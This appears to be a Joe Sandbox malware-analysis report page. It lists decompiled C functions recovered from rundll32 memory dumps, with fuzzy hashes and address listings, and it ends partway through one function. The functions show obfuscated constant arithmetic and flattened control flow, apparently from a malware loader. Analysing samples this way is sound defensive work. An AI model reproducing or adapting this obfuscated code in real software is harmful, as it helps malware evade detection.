Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #S5
API String ID: 0-40889119
Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
Instruction ID: 06f24018c48da1308f59366a7722fcebe1e27b97d209b028ebbd8fd4802220d9
Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
Instruction Fuzzy Hash: E93132B2D0020AEBCB48DFE5C94AAEFBBB1FB84304F20809AD515B6250D7B50B15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007C09B5 Relevance: 1.3, Strings: 1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007C09B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E007A94EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}

0x007c09bb
0x007c09bf
0x007c09c6
0x007c09cd
0x007c09d4
0x007c09db
0x007c09e2
0x007c09e9
0x007c09f0
0x007c09f7
0x007c09fe
0x007c0a09
0x007c0a12
0x007c0a17
0x007c0a1e
0x007c0a25
0x007c0a2f
0x007c0a32
0x007c0a35
0x007c0a3c
0x007c0a43
0x007c0a4a
0x007c0a55
0x007c0a5b
0x007c0a62
0x007c0a69
0x007c0a70
0x007c0a77
0x007c0a7b
0x007c0a82
0x007c0a89
0x007c0a90
0x007c0ab3
0x007c0abd
0x007c0ac7

Strings

6Rr, xrefs: 007C09F0

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6Rr
API String ID: 0-3911282678
Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
Instruction ID: be3451386625e2adbfc9d501d682c0aab99b0d1041b9e28f2d8b49c07334bdee
Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
Instruction Fuzzy Hash: 9E31E1B1D1021EEBDB04CFA5C94A9EEFBB5FB48318F108699D121B6250D3B85B59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007B8519 Relevance: 1.3, Strings: 1, Instructions: 49
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E007B8519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E007B20B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E007AA30C(_v12, _a4, E007A1DB9(__ecx), _v20);
			}

0x007b851f
0x007b8523
0x007b8524
0x007b8529
0x007b8530
0x007b8537
0x007b853e
0x007b8545
0x007b854c
0x007b8553
0x007b855a
0x007b8561
0x007b856c
0x007b856f
0x007b8576
0x007b857d
0x007b8584
0x007b858b
0x007b8592
0x007b8599
0x007b859c
0x007b85a3
0x007b85aa
0x007b85b1
0x007b85b8
0x007b85bf
0x007b85c6
0x007b85cd
0x007b85d4
0x007b85db
0x007b8605

Strings

8, xrefs: 007B8561

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8
API String ID: 0-719543824
Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
Instruction ID: 2e12093bb3dcb1c3fb8b2a2a26c0ff9a497ff99b506b86517a61f68b8db92eaf
Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
Instruction Fuzzy Hash: C121B2B6C00209EBDF48DFE5CA8689EBFB5FF40314F608189E411B6261D3B54B54DB95

Uniqueness

Uniqueness Score: -1.00%

Function 100323E2 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0

Uniqueness

Uniqueness Score: -1.00%

Function 10031FC2 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0

Uniqueness

Uniqueness Score: -1.00%

Function 10031BB6 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0

Uniqueness

Uniqueness Score: -1.00%

Function 100317E2 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0

Uniqueness

Uniqueness Score: -1.00%

Function 007A4346 Relevance: .2, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007A4346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E007AAE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E007AAE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E007A7FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}

0x007a434d
0x007a4351
0x007a4353
0x007a4357
0x007a4358
0x007a4359
0x007a435e
0x007a4366
0x007a436b
0x007a436d
0x007a4371
0x007a4376
0x007a4384
0x007a4389
0x007a438f
0x007a4397
0x007a439f
0x007a43a4
0x007a43ac
0x007a43b8
0x007a43bd
0x007a43c3
0x007a43c8
0x007a43d0
0x007a43d8
0x007a43e5
0x007a43e8
0x007a43ec
0x007a43f4
0x007a43fc
0x007a440c
0x007a4410
0x007a4418
0x007a4420
0x007a4428
0x007a4430
0x007a443c
0x007a4441
0x007a4447
0x007a444f
0x007a4457
0x007a445f
0x007a4467
0x007a446f
0x007a4477
0x007a447f
0x007a4487
0x007a448f
0x007a4497
0x007a449f
0x007a44a7
0x007a44ac
0x007a44b4
0x007a44c0
0x007a44c3
0x007a44c7
0x007a44cc
0x007a44d9
0x007a44e6
0x007a44ee
0x007a44f6
0x007a44fe
0x007a450b
0x007a450f
0x007a4517
0x007a451f
0x007a4527
0x007a452f
0x007a4534
0x007a453c
0x007a4544
0x007a454c
0x007a4554
0x007a455c
0x007a455c
0x007a4566
0x007a45bd
0x007a45e3
0x007a45e8
0x007a45ed
0x007a45ef
0x00000000
0x007a45ef
0x007a4568
0x007a456e
0x007a45b9
0x00000000
0x007a4570
0x007a4576
0x00000000
0x007a457c
0x007a457c
0x007a45a1
0x007a45ad
0x007a45ad
0x007a4576
0x007a456e
0x007a45b0
0x007a45b8
0x007a45b8
0x007a4606
0x007a4607
0x007a460d
0x007a4613
0x007a461f
0x00000000
0x007a4615
0x007a4615
0x00000000
0x007a4615
0x00000000
0x007a4624
0x007a4624
0x00000000

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
Instruction ID: 7113989e992419d6665847ce700bda7e5be66adbe9f2c0f104aa2204159ff78b
Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
Instruction Fuzzy Hash: B57133B2509341AFD358CF21C98982BBBF1EBD9718F10891DF29556260D3B6CA59CF83

Uniqueness

Uniqueness Score: -1.00%

Function 007B894B Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007B894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E007A3DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E007A2A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E007BD97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

0x007b8952
0x007b8956
0x007b8958
0x007b895a
0x007b895e
0x007b8962
0x007b8966
0x007b8967
0x007b8968
0x007b896d
0x007b8975
0x007b897e
0x007b8980
0x007b8987
0x007b898c
0x007b8992
0x007b8997
0x007b899f
0x007b89a7
0x007b89af
0x007b89b7
0x007b89bf
0x007b89c7
0x007b89cc
0x007b89d8
0x007b89dd
0x007b89e3
0x007b89eb
0x007b89f3
0x007b89fb
0x007b8a03
0x007b8a10
0x007b8a13
0x007b8a17
0x007b8a1f
0x007b8a27
0x007b8a34
0x007b8a38
0x007b8a3d
0x007b8a45
0x007b8a55
0x007b8a59
0x007b8a61
0x007b8a69
0x007b8a75
0x007b8a7d
0x007b8a81
0x007b8a89
0x007b8a91
0x007b8a99
0x007b8aa1
0x007b8aa6
0x007b8aae
0x007b8aae
0x007b8abc
0x007b8b33
0x007b8b38
0x007b8b3b
0x00000000
0x007b8abe
0x007b8ac4
0x007b8b0e
0x007b8b13
0x007b8b16
0x007b8b18
0x007b8b1a
0x00000000
0x007b8b1a
0x007b8ac6
0x007b8ac6
0x007b8acc
0x00000000
0x007b8ace
0x007b8ae2
0x007b8aef
0x007b8aef
0x007b8acc
0x007b8ac4
0x007b8af3
0x007b8afb
0x007b8afb
0x007b8b45
0x007b8b47
0x007b8b47
0x007b8b47
0x00000000

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
Instruction ID: fd2c93d7d3745622c282ceb27e6229a042eb1ef4b88977d5fbdfd4737b4f55ad
Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
Instruction Fuzzy Hash: 80518971108301AFC794CF22C98A85BBBE5FBD8748F50892EF59596220D776CA19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 007BAC3A Relevance: .1, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E007BAC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E007A474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E007BC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

0x007bac3a
0x007bac3a
0x007bac3d
0x007bac47
0x007bac4f
0x007bac5e
0x007bac68
0x007bac6c
0x007bac6e
0x007bac76
0x007bac78
0x007bac80
0x007bac88
0x007bac90
0x007bac98
0x007baca0
0x007bacab
0x007bacb8
0x007bacbc
0x007bacc4
0x007baccc
0x007bacd4
0x007bacdc
0x007bace4
0x007bacec
0x007bacf4
0x007bacfe
0x007bad02
0x007bad0a
0x007bad17
0x007bad1b
0x007bad20
0x007bad28
0x007bad35
0x007bad39
0x007bad3e
0x007bad43
0x007bad4b
0x007bad4b
0x007bad51
0x007bad8a
0x007bad8b
0x007bad8c
0x007bad91
0x007bad94
0x007bad96
0x00000000
0x007bad53
0x007bad55
0x00000000
0x007bad57
0x007bad72
0x007bad72
0x007bad55
0x007bad74
0x007bad7d
0x007bad7d
0x007bad9a
0x007bad9c
0x007bad9c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
Instruction ID: 430735ed04d49cb7218d151015493afee33431e60c6866b708970a1caa0ac757
Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
Instruction Fuzzy Hash: 0C3175725083019BC314DF25C88944BFBE0FBD8788F108A1DF599A7220D379DA498B97

Uniqueness

Uniqueness Score: -1.00%

Function 007A8969 Relevance: .1, Instructions: 84
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007A8969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E007B20B9(_t84);
